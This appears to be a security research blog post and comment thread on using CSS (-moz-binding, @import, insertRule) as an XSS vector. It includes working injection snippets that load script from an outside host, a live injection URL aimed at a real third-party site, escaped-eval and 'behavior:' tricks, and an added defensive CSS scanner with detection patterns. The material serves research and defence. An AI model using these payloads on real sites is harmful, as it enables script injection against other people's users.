XCSS

I thought I’d continue the theme of experimenting with XSS and trying different things; I haven’t seen this written about anywhere, so here goes. The idea is to use CSS as an XSS payload, which can be useful when filters allow some things but make it difficult to construct an attack.

I’ve decided to call it XCSS (Cross site Cascading Style Sheets), and there are many ways you can inject them into a document. I’ll show how to do it in Firefox, but it will be possible with other browsers as well.

Step 1 – A moz binding document

We first need a moz binding document to demonstrate this method; a sample one can be found here:-
Moz Binding sample
I’m not going to explain the details of what one can do, so if you want to find out more then just Google it. This example simply injects a JavaScript alert.

Step 2 – Embedding the style

There are many ways of embedding a stylesheet into a document; here I’ll show you three.

1.

<link href="//businessinfo.co.uk/labs/xbl/xbl.xml#xss" rel="stylesheet" type="text/css" />

2.

<style type="text/css">@import url("//businessinfo.co.uk/labs/xcss/xcss.css");</style>

3. Finally, using JavaScript to add a rule to an existing stylesheet:-

<script type="text/javascript">
// Inserts a rule into the page's first stylesheet; the page must already have one,
// otherwise document.styleSheets.item(0) returns null. The -moz-binding property
// makes Firefox load the XBL document from step 1.
function performXCSS() {
	var css = document.styleSheets.item(0);
	css.insertRule('body {-moz-binding:url("//businessinfo.co.uk/labs/xbl/xbl.xml#xss");}', 0);
}
</script>
<a href="javascript:performXCSS();">Perform XCSS</a>
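All three delivery methods above depend on the application letting user-controlled CSS (inline text, an `@import`, or a `cssfile`-style link parameter) reach the browser. As an added defender-side example, not code from the original post or its comments, the following JavaScript scans a stylesheet before it is served and flags the constructs this page relies on: `-moz-binding`, `@import`, and any `url()` that leaves the page's origin. It also covers the IE-only `behavior:` and `expression(` properties mentioned later in the comments, and decodes CSS hex escapes first so that a property name spelled `-m\6fz-binding` is not missed. The host `attacker.example`, the page origin `app.example` and the sample stylesheets are constructed for this example.

```javascript
// Added example: scanner for user-supplied CSS (not from the original post).
// Normalise first: strip comments, decode CSS hex escapes (\6f -> "o"), drop
// remaining backslash escapes, collapse whitespace, lowercase. Matching on the
// raw text would let "-m\6fz-binding" slip past a search for "-moz-binding".
function normaliseCss(cssText) {
  let s = cssText.replace(/\/\*[\s\S]*?\*\//g, '');
  s = s.replace(/\\([0-9a-fA-F]{1,6})\s?/g, (_, hex) =>
    String.fromCodePoint(parseInt(hex, 16)));
  s = s.replace(/\\(.)/g, '$1');
  return s.replace(/\s+/g, ' ').toLowerCase();
}

// Properties and at-rules that turn a stylesheet into a script or fetch vector.
const DANGEROUS_PATTERNS = [
  { id: 'moz-binding',   re: /-moz-binding\s*:/ },  // XBL binding (Firefox, this post)
  { id: 'ie-behavior',   re: /\bbehavior\s*:/ },    // .htc behaviours (IE)
  { id: 'ie-expression', re: /expression\s*\(/ },   // IE dynamic properties
  { id: 'import',        re: /@import\b/ },         // pulls in another stylesheet
];

// Resolve a reference (absolute, protocol-relative "//host/...", or relative)
// against pageOrigin and report whether it stays on that origin. javascript:
// and data: URLs resolve to the opaque origin "null" and are therefore rejected.
function isSameOrigin(ref, pageOrigin) {
  let u;
  try { u = new URL(ref, pageOrigin); } catch { return false; }
  return u.origin === new URL(pageOrigin).origin;
}

// Returns the list of findings for one stylesheet; an empty list means clean.
function scanCss(cssText, pageOrigin) {
  const css = normaliseCss(cssText);
  const findings = [];
  for (const { id, re } of DANGEROUS_PATTERNS) {
    if (re.test(css)) findings.push(id);
  }
  const urlRe = /url\(\s*["']?([^"')\s]+)["']?\s*\)/g;
  let m;
  while ((m = urlRe.exec(css)) !== null) {
    if (!isSameOrigin(m[1], pageOrigin)) findings.push('cross-origin-url:' + m[1]);
  }
  return findings;
}

// Constructed samples: the post's payload shape with a placeholder host, a
// hex-escaped variant of it, an @import, and a benign same-origin stylesheet.
const SAMPLES = {
  binding:  'body {-moz-binding:url("//attacker.example/xbl.xml#xss");}',
  escaped:  'body {-m\\6fz-binding:url("//attacker.example/xbl.xml#xss");}',
  imported: '@import url("//attacker.example/xcss.css");',
  benign:   'body { color: #333; background: url("/img/bg.png"); }',
};

for (const [name, css] of Object.entries(SAMPLES)) {
  console.log(name, scanCss(css, 'https://app.example'));
}
```

`isSameOrigin` is also the check to apply to a link parameter such as the `cssfile` value in the live demo below: a protocol-relative `//host/...` value resolves to a foreign origin and is rejected. On the browser side, a Content-Security-Policy of `style-src 'self'` refuses cross-origin stylesheets regardless of how they were injected, which complements the server-side scan.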

11 Responses to “XCSS”

  1. Gareth Heyes writes:

    Here’s a live demo of XCSS injection:-
    http://www.csszengarden.com/?cssfile=//businessinfo.co.uk/labs/xcss/xcss.css

  2. kuza55 writes:

    You haven’t seen it written about anywhere because it’s been on Rsnake’s Cheat Sheet for as long as I can remember, and so no-one has felt the need to write a post about it, since it was assumed we all knew it existed.

  3. Gareth Heyes writes:

    Yeah ok, I missed it on rsnake’s cheatsheet, but so what?

    Just because someone creates a list of vectors doesn’t mean that someone can’t post new ideas of exploiting it.

    I was going to continue this post with information about exploiting different browsers at once and rewriting urls and changing content in Opera. But hey the cheatsheet apparently tells all.

    Please direct me to the place in the cheatsheet where it mentions insertRule? I’ve checked but I couldn’t find it.

  4. digi7al64 writes:

    The technique “-moz-binding” is old but the delivery method is “new” for lack of a better word (using insertrule).

    Either way though (1 & 2) means I have free range with the css and I would probably target something more generic that would affect more browsers other than just firefox.

    And with 3, why would I bother using that technique? No offence, but you would be hard pressed to find a site that allows script tags and functions but filters out src etc.

    Finally, XCSS is wrong, it is cross site scripting only. If we go down the path of giving every single attack method an acronym then I want to claim IXSS (which is image cross site scripting [think IE]). Also what about RXSS (Redirect cross site scripting) or FXSS (Flash cross site scripting) etc… but you get my idea.

    Still, I look forward to your work on persistent xss via css (if possible).

  5. .mario writes:

    I think it’s not important if something has already been written somewhere. Especially WebAppSec is an extremely large field and thus it’s important to persist facts via repetition and extension. In fact I haven’t looked inside the document.styleSheets property that deep yet – this article made me, and that’s good because I found a nice way to use things inside this property for my work.

    And while playing I found out that including a URL like http://www.google.com is tolerated by the browser and nodes in the including document even apply the styles coming from http://www.google.com.

    <html>
    <!-- a non-CSS document is still loaded as a stylesheet; console.dir shows it in document.styleSheets -->
    <link rel="stylesheet" href="http://www.google.de/" type="text/css" />
    <script>
    window.onload = function() {
    console.dir(document.styleSheets)
    }
    </script>
    <body class="h">
    TEST
    </body>
    </html>

    Maybe this has been written about somewhere else but at least it was new to me 🙂

  6. .mario writes:

    Ah – and there’s one more thing to add – check out the double eval 🙂

    <style>
    /* hex-escaped CSS string; the browser decodes it to "alert(1)" */
    body:after{
    content: "\61\6c\65\72\74\28\31\29"
    }
    </style>
    <script>
    // style.content serialises as a quoted string: the first eval unwraps it, the second runs it
    eval(eval(document.styleSheets[0].cssRules[0].style.content))
    </script>

  7. kuza55 writes:

    I may have been a bit abrupt when I posted that comment, but I still stand by it.

    The Cheat Sheet isn’t exactly some obscure text file which has never been indexed by google. And googling for “-moz-binding” XSS would have gotten you results; hell, I linked the part of the Cheat Sheet which mentioned the issue in a slackers thread which you later replied to.

    Anyway, I know that the insertRule thing is obscure, but it really doesn’t help us anywhere, since our main interest in -moz-binding is its uses for XSS, which is pretty useless if we can execute js already. And anyway, is it any better than simply editing the style attribute directly via javascript as most developers do?

    But having said that, I don’t want to stop you exploring and innovating, I just thought I ought to mention it’s not new. So if you have something new, please go ahead, I’m very eager to see people do new things, and as frustrating as it is when someone points out to you that it’s already been published, you should just take it on board, and publish something new on the same issue to spite me :p

  8. Gareth Heyes writes:

    @Mario

    Excellent stuff! I’m sure there’s loads more to explore in this area.

    @digi7al64

    Yeah the acronym might not work but I don’t really care, I just wanted to call my blog post something interesting. Yes you’re right that the delivery of insertRule may be obscure and rare but I liked it and found it interesting and I’m sure not many people are aware of it.

    @kuza55

    The way I conduct my research is always in a manual manner and rarely do I use cheatsheets or xss proxies etc. Because of this I sometimes publish things that are already mentioned elsewhere; this is purely an accident and I’m not trying to steal anyone’s work. In future, however, I’ll check the cheatsheet more thoroughly.

    I feel that this post provides information that is more useful than just using the method listed in the cheatsheet because:-
    1. The insertRule method is mentioned, and changing the stylesheet dynamically.
    2. Assigning MozBinding via a stylesheet has never been explained or mentioned anywhere as far as I know.
    3. A live example of the method which demonstrates that allowing external stylesheets is a bad idea.

    Why should I have to justify all this though? The cheatsheet doesn’t make every blog post on XSS obsolete.

  9. ascii writes:

    @Gareth Heyes: sorry but not a new vector or something new, insertRule or appendChild or xxYY doesn’t change this fact

    http://archives.neohapsis.com/archives/fulldisclosure/2006-01/0933.html

    mistakes happen : ) why not simply acknowledge? nobody is blaming you here

    [fun]ouch, found BXSS! “behavior: url(xss.htc);”, it can be embedded in an external css! :D[/fun]

  10. Gareth Heyes writes:

    @ascii

    Yeah ok, it’s a mistake. I hadn’t read it anywhere before, but forgive me for defending myself when I get a lot of negative comments for trying to do things differently.

  11. ascii writes:

    no problem, you do good research! 🙂